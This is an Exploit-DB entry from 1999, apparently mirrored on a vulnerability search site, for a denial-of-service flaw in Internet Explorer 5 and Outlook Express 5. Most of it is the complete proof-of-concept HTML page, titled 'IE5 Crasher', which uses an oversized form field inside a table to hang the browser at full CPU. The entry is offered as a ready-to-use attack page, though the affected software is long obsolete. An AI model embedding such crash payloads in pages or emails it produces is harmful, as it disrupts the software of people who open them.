Lucene search

K
exploitdbNeon BunnyEDB-ID:19471
HistoryAug 27, 1999 - 12:00 a.m.

Microsoft Internet Explorer 5 - HTML Form Control Denial of Service

1999-08-2700:00:00
Neon Bunny
www.exploit-db.com
14

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

source: https://www.securityfocus.com/bid/606/info

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed. 

---{START SOURCE}---

<html>

<head>
<title>NeonBunny's IE5 Crasher</title>
</head>

<body>

<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

---{STOP SOURCE}--- 

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%